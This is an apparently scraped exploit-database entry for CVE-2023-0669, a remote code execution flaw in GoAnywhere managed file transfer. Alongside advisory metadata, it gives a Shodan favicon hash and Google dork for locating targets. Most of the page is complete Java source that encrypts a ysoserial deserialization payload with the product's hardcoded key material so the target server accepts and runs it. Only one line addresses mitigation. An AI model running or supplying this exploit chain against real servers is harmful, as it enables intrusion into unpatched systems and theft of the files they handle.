Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)

vendor:

GoAnywhere Encryption Helper

by:

Youssef Muhammad

7.2

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: GoAnywhere Encryption Helper

Affected Version From: 7.1.1 for windows / 7.0.3 for Linux

Affected Version To: 7.1.1 for windows / 7.0.3 for Linux

Patch Exists: YES

Related CWE: CVE-2023-0669

CPE: a:goanywhere:goanywhere_encryption_helper

Metasploit: https://www.rapid7.com/db/vulnerabilities/goanywhere-cve-2023-0669-remote-code-injection/, https://www.rapid7.com/db/modules/exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669/

Tags: cve,cve2023,rce,goanywhere,oast,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html, https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1, https://infosec.exchange/@briankrebs/109795710941843934, https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/, https://nvd.nist.gov/vuln/detail/CVE-2023-0669

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.favicon.hash:1484947000', 'verified': True, 'vendor': 'fortra', 'product': 'goanywhere_managed_file_transfer'}

Platforms Tested: Windows, Linux

2023

Goanywhere Encryption helper 7.1.1 – Remote Code Execution (RCE)

This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution.

Mitigation:

Ensure that the encryption helper is up to date and that all security patches are applied.

Source

Exploit-DB raw data:

// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
// Google Dork:  title:"GoAnywhere" 
// Date: 3/26/2023
// Exploit Author: Youssef Muhammad
// Vendor Homepage: https://www.goanywhere.com/
// Software Link:  https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
// Version:  > 7.1.1 for windows / > 7.0.3 for Linux 
// Tested on: Windows, Linux
// CVE : CVE-2023-0669
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution 

import java.util.Base64;
import javax.crypto.Cipher;
import java.nio.charset.StandardCharsets;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CVE_2023_0669_helper {
    static String ALGORITHM = "AES/CBC/PKCS5Padding";
    static byte[] KEY = new byte[30];
    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);
    public static void main(String[] args) throws Exception {
        if (args.length != 2) {
            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
            System.exit(1);
        }
        String filePath = args[0];
        String version = args[1];
        byte[] fileContent = Files.readAllBytes(Paths.get(filePath));
        String encryptedContent = encrypt(fileContent, version);
        System.out.println(encryptedContent);
    }
    public static String encrypt(byte[] data, String version) throws Exception {
        Cipher cipher = Cipher.getInstance(ALGORITHM);
        KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();
        SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");
        IvParameterSpec ivSpec = new IvParameterSpec(IV);
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
        byte[] encryptedObject = cipher.doFinal(data);
        String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);
        String v = (version.equals("2")) ? "$2" : "";
        bundle += v;
        return bundle;
    }
    private static byte[] getInitializationValue() throws Exception {
        // Version 1 Encryption
        String param1 = "go@nywhereLicenseP@$$wrd";
        byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};
        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();
    }
    private static byte[] getInitializationValueV2() throws Exception {
        // Version 2 Encryption
        String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
        byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();
    }
}